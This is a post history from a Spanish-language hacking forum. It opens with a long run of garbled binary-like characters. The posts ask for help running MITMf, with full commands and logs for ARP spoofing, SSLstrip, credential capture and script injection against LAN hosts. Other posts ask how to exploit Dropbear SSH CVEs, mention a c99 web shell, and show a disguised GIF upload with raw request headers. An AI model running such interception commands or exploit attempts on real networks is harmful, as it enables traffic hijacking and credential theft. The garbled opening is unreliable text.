ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ€ € € € € € ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFis ÿ ÿ ÿ ÿ ÿ ÿ ÿ FisFisFis ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿ€ € € € € € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ FisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿ€ € € € € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFis ÿ ÿ ÿ ÿ ÿFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ€ € € € € € € € € € € € € ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFis ÿ ÿ ÿ ÿ ÿ ÿ FisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿsi me pueden ayudar a capturar la imagen por favor por que es como si estuviera escondida y no la atrapa.
#7
Dudas y pedidos generales / Re:Consulta sobre MITMF!
Febrero 19, 2018, 02:21:34 PM
hola gracias por responder pero aun no funciona ya esta optimo y no pasa nada es lo que no entiendo pero con bettercap si puedo usarlo. ustedes pueden usar mitmf? esta es desde mi raspberry pi con kali pero aun asi no anda..
aquí uno que tiene el bug info.
mitmf --arp --spoof --hsts --gateway 192.168.0.1 --target 192.168.0.wlan0 --log-level debug
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
2018-02-19 17:18:47 MITMf started: ['./mitmf.py', '--arp', '--spoof', '--hsts', '--gateway', '192.168.0.1', '--target', '192.168.0.106', '-i', 'wlan0', '--log-level', 'debug']
aquí uno que tiene el bug info.
mitmf --arp --spoof --hsts --gateway 192.168.0.1 --target 192.168.0.wlan0 --log-level debug
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
2018-02-19 17:18:47 MITMf started: ['./mitmf.py', '--arp', '--spoof', '--hsts', '--gateway', '192.168.0.1', '--target', '192.168.0.106', '-i', 'wlan0', '--log-level', 'debug']
- MITMf v0.9.8 - 'The Dark Side'
2018-02-19 17:18:51 [ProxyPlugins] Adding Spoof plugin
|_ Spoof v0.6
2018-02-19 17:18:51 [ARPpoisoner] gatewayip => 192.168.0.1
2018-02-19 17:18:51 [ARPpoisoner] gatewaymac => 60:e3:27:3d:83:24
2018-02-19 17:18:51 [ARPpoisoner] targets => [IPAddress('192.168.0.106')]
2018-02-19 17:18:51 [ARPpoisoner] ignore => []
2018-02-19 17:18:51 [ARPpoisoner] ip => 192.168.0.112
2018-02-19 17:18:51 [ARPpoisoner] mac => 7c:dd:90:d0:0a:b9
2018-02-19 17:18:51 [ARPpoisoner] interface => wlan0
2018-02-19 17:18:51 [ARPpoisoner] arpmode => rep
2018-02-19 17:18:51 [ARPpoisoner] interval => 3
2018-02-19 17:18:51 [Utils] Setting ip forwarding to 1
2018-02-19 17:18:51 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
| |_ ARP spoofing enabled
2018-02-19 17:18:51 [ProxyPlugins] Adding SSLstrip+ plugin
|_ SSLstrip+ v0.4
| |_ SSLstrip+ by Leonardo Nve running
2018-02-19 17:18:52 [Utils] Setting iptables DNS redirection rule from port 53 to 53
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
* Running on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
2018-02-19 17:18:54 [ARPpoisoner] Resolved 192.168.0.106 => d0:13:fd:25:76:31
#8
Dudas y pedidos generales / Consulta sobre MITMF!
Febrero 18, 2018, 02:41:26 PM
buenas tarde amigos el dia de hoy les quiero preguntar si tienen problemas con mitmf ya que no esta trabajando por lo menos en mis 2 pc no lo hace y bettercap si trabaja lo eh instaalado de il formas y eh reinstalado la distro y no se xq no me funciona
aqui el comando que utilizo :
python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --arp --spoof --gateway 192.168.0.1 --target 192.168.0.19 --inject --js-url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -i wlan0
esta es la salida de la consola
aqui el comando que utilizo :
python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --arp --spoof --gateway 192.168.0.1 --target 192.168.0.19 --inject --js-url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -i wlan0
esta es la salida de la consola
- MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
net.ipv4.ip_forward = 1
| |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
* Running on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Press CTRL+C to quit)
|_ Net-Creds v1.0 online
Error starting HTTP server: [Errno 98] Address already in use
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
^C
^C2018-02-18 12:36:11 [ARPpoisoner] Restoring connection 192.168.0.19 <-> 192.168.0.1 with 2 packets per host
net.ipv4.ip_forward = 0
pero no captura nada de nada se queda estatico no captura no injec no keylogger no nada no hace nada se quesda hay y no avanza si me puedeen ayudar por favor se los agradesco mucho... feliz tarde
#9
Dudas y pedidos generales / Como Explotar Dropbear SSH
Febrero 06, 2018, 09:15:09 PM
buenas tardes me podrian ayudar con este bug porfa no consigo como explotar..y no consigo informacion de como por lo menos crear algo para explotarlo..si me pueden ayudar gracias .
Dropbear SSH Server < 2016.72 Multiple Vulnerabilities
Description
According to its self-reported version in its banner, Dropbear SSH running on the remote host is prior to 2016.74. It is, therefore, affected by the following vulnerabilities :
- A format string flaw exists due to improper handling of string format specifiers (e.g., %s and %x) in usernames and host arguments. An unauthenticated, remote attacker can exploit this to execute arbitrary code with root privileges. (CVE-2016-7406)
- A flaw exists in dropbearconvert due to improper handling of specially crafted OpenSSH key files. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-7407)
- A flaw exists in dbclient when handling the -m or -c arguments in scripts. An unauthenticated, remote attacker can exploit this, via a specially crafted script, to execute arbitrary code. (CVE-2016-7408)
- A flaw exists in dbclient or dropbear server if they are compiled with the DEBUG_TRACE option and then run using the -v switch. A local attacker can exploit this to disclose process memory. (CVE-2016-7409)
Dropbear SSH Server < 2016.72 Multiple Vulnerabilities
Description
According to its self-reported version in its banner, Dropbear SSH running on the remote host is prior to 2016.74. It is, therefore, affected by the following vulnerabilities :
- A format string flaw exists due to improper handling of string format specifiers (e.g., %s and %x) in usernames and host arguments. An unauthenticated, remote attacker can exploit this to execute arbitrary code with root privileges. (CVE-2016-7406)
- A flaw exists in dropbearconvert due to improper handling of specially crafted OpenSSH key files. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-7407)
- A flaw exists in dbclient when handling the -m or -c arguments in scripts. An unauthenticated, remote attacker can exploit this, via a specially crafted script, to execute arbitrary code. (CVE-2016-7408)
- A flaw exists in dbclient or dropbear server if they are compiled with the DEBUG_TRACE option and then run using the -v switch. A local attacker can exploit this to disclose process memory. (CVE-2016-7409)
#10
Dudas y pedidos generales / Re:[SOLUCIONADO] Que tipo de cifrado es el que explico aca ?
Enero 13, 2017, 08:04:11 PM
ejejejejje gracias muchachos correctamente es hex.. gracias no desencripte pero consegui como estaba cifrado xD
#11
Dudas y pedidos generales / Re:Problema con wargame
Enero 13, 2017, 05:24:13 PM
buenas tardes tal vez era el server o a lo mejor era la shell c99 pero utilice el webshell y me funciono
#12
Dudas y pedidos generales / Re:problema con wargame
Enero 13, 2017, 04:38:28 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Prueba a subir un gif que te soltará la url donde se guardan.
Cual es el content type de los archivos que estas mandando?
Saludos.
realicee el upload del gif pero no me dio la url quedo igual cabe destacar que el server lo cambiaron de url y no sabia hasta hoy que lo entontre aca las capturas del tamper;
Host:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cookie: _ga=GA1.2.475254184.1484249828; PHPSESSID=eeabkuktlddtst2aa3qhgsov7d
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------77801167120836153441266406235
Content-Length: 762067
----------------------------------------------------------------------------------------------------------------------------------------------------------------
aqui el post enviado
-----------------------------77801167120836153441266406235\r\n
Content-Disposition: form-data; name="archivo"; filename="f.gif"\r\n
Content-Type: image/gif\r\n
\r\n
GIF89aÁ\x02O\x02÷¼
#13
Dudas y pedidos generales / [SOLUCIONADO] Que tipo de cifrado es el que explico aca ?
Enero 13, 2017, 03:55:40 PM
buenas tardes compañeros me podrian indicar..
que tipo de cifrado es este ya que no lo eh visto antes ??
The password it is encrypted
Passphrase: 6166366266626164646464636565363934663933303166306262373364633632
si me podrian ayudar porfa lo agradeceria.
que tipo de cifrado es este ya que no lo eh visto antes ??
The password it is encrypted
